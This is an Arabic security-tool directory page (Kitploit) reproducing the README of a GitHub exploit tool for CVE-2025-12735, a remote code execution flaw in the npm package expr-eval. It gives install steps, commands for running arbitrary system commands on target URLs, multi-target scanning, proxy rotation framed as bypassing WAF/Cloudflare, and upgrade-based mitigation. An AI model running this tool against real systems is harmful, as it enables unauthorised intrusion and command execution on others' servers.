Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-12735-expr-eval-rce — أداة أبحاث أمنية لكشف واختبار CVE-2025-12735 (ثغرة RCE في expr-eval) | Kitploit
أدوات/GitHubGitHub/alnashawatirohwederb2167-max/cve-2025-12735-expr-eval-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubalnashawatirohwederb2167-max/cve-2025-12735-expr-eval-rce

cve-2025-12735-expr-eval-rce

أداة أبحاث أمنية لكشف واختبار CVE-2025-12735 (ثغرة RCE في expr-eval)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

استغلال CVE-2025-12735 expr-eval RCE

أداة بحث أمني لاكتشاف واختبار ثغرة CVE-2025-12735 في حزمتي npm expr-eval و expr-eval-fork.

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة لاختبارات الأمان المصرح بها والأغراض التعليمية فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدم هذه الأداة فقط على الأنظمة التي تملكها أو التي لديك إذن كتابي صريح لاختبارها.

📋 نظرة عامة

CVE-2025-12735 هي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد (RCE) في حزمتي npm expr-eval و expr-eval-fork. تسمح هذه الثغرة للمهاجمين بتعريف دوال اعتباطية داخل كائن context المستخدم من قِبل المحلِّل (parser)، مما يتيح حقن تعليمات برمجية خبيثة تنفّذ أوامر على مستوى النظام.

درجة CVSS: 9.8 (حرجة)
الإصدارات المتأثرة: expr-eval-fork < 3.0.0
الإصدار المُصلَح: expr-eval-fork v3.0.0+

🔍 الميزات

  • كشف آلي: يفحص استخدامات مكتبة expr-eval في ملفات JavaScript
  • اكتشاف نقاط النهاية: يجد نقاط نهاية التقييم تلقائيًا
  • اختبار الثغرات: يختبر ثغرة CVE-2025-12735
  • تنفيذ الأوامر: يُظهر قدرة RCE (للاختبارات المصرح بها)
  • دعم تعدد الخيوط: فحص أهداف متعددة بالتوازي
  • دعم البروكسي: تجاوز قيود WAF/Cloudflare
  • تصدير JSON: نتائج مفصلة بصيغة JSON

📦 التثبيت

المتطلبات الأساسية

  • Python 3.6 أو أحدث
  • pip (مدير حزم بايثون)

التثبيت السريع

root@kitploit:~
# Clone the repository
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce

# Install dependencies
pip install -r requirements.txt

# Make script executable (optional)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py

بديل: التحميل المباشر

root@kitploit:~
# Download the script
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py

# Install dependencies
pip install requests

🚀 الاستخدام

الاستخدام الأساسي

root@kitploit:~
# Single target
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com

# Execute custom command
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"

# Multiple targets from file
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

# With threading for faster scanning
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5

# Verbose output for debugging
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v

استخدام البروكسيات

root@kitploit:~
# Single proxy
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port

# Multiple proxies from file
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

خيارات سطر الأوامر

root@kitploit:~
-u, --url          Target URL
-f, --file         File containing target URLs (one per line)
-c, --command      Command to execute (default: id)
-t, --threads      Number of threads (default: 1)
-o, --output       Output file (default: uknf_expr_eval_results.json)
-v, --verbose      Enable verbose logging
--proxy            Proxy URL (e.g., http://127.0.0.1:8080)
--proxy-list       File containing proxy URLs (one per line)

📊 المخرجات

ينشئ السكربت ملف JSON بنتائج مفصلة:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:35:32.638109",
  "expr_eval_detected": true,
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/api/evaluate"
}

🔬 كيف يعمل

  1. مرحلة الكشف: يفحص ملفات JavaScript ومحتوى HTML بحثًا عن مراجع expr-eval
  2. اكتشاف نقاط النهاية: يختبر نقاط نهاية API الشائعة التي قد تستخدم expr-eval
  3. اختبار الثغرة: يحاول حقن دوال اعتباطية في كائن context
  4. الاستغلال: إذا كانت الثغرة موجودة، يُظهر قدرة RCE

🛡️ التخفيف

إذا كنت تستخدم expr-eval أو expr-eval-fork:

  1. قم بالترقية فورًا:

    root@kitploit:~
    npm install expr-eval-fork@latest
    
  2. طبّق التصحيح الأمني:

    • طبّق Pull Request #288 على expr-eval
    • أو انتقل إلى expr-eval-fork v3.0.0+
  3. نفّذ التحقق من صحة الإدخال:

    • عقّم جميع مدخلات المستخدم
    • استخدم القائمة البيضاء للدوال
    • تحقق من صحة كائنات context

📚 المراجع

  • CVE: CVE-2025-12735
  • CERT: VU#263614
  • استشارة GitHub: GHSA-jc85-fpwf-qm7x
  • التصحيح الأمني: PR #288

📖 أمثلة

مثال 1: فحص هدف واحد

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com

مثال 2: أهداف متعددة مع المخرجات

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Run scan
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

مثال 3: تنفيذ أمر مخصص

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"

مثال 4: استخدام البروكسيات

root@kitploit:~
# Single proxy
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080

# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

🤝 المساهمة

المساهمات مرحّب بها! لا تتردد في تقديم Pull Request.

  1. قم بعمل Fork للمستودع
  2. أنشئ فرع الميزة الخاص بك (git checkout -b feature/AmazingFeature)
  3. احفظ تغييراتك (git commit -m 'Add some AmazingFeature')
  4. ادفع التغييرات إلى الفرع (git push origin feature/AmazingFeature)
  5. افتح Pull Request

🐛 المشكلات

إذا واجهت أي مشكلات أو كانت لديك اقتراحات، يرجى فتح issue على GitHub.

📝 الترخيص

هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

⭐ سجل النجوم

إذا وجدت هذه الأداة مفيدة، فيُرجى التفكير في منحها نجمة (Star) على GitHub!

⚖️ الجانب القانوني

هذه الأداة مقدمة للأغراض التعليمية واختبارات الأمان المصرح بها فقط. المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج. يتحمل المستخدمون مسؤولية التأكد من حصولهم على التفويض المناسب قبل اختبار أي أنظمة.

🙏 الشكر والتقدير

  • مُبلّغ الثغرة الأصلي: Jangwoo Choe (UKO)
  • مركز تنسيق CERT للإفصاح عن الثغرات
  • فريق أمان GitHub وnpm للاستشارات الأمنية

💰 التبرعات

إذا وجدت هذه الأداة مفيدة وترغب في دعم المشروع:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

شكرًا لدعمك! 🙏

تنزيل الأداة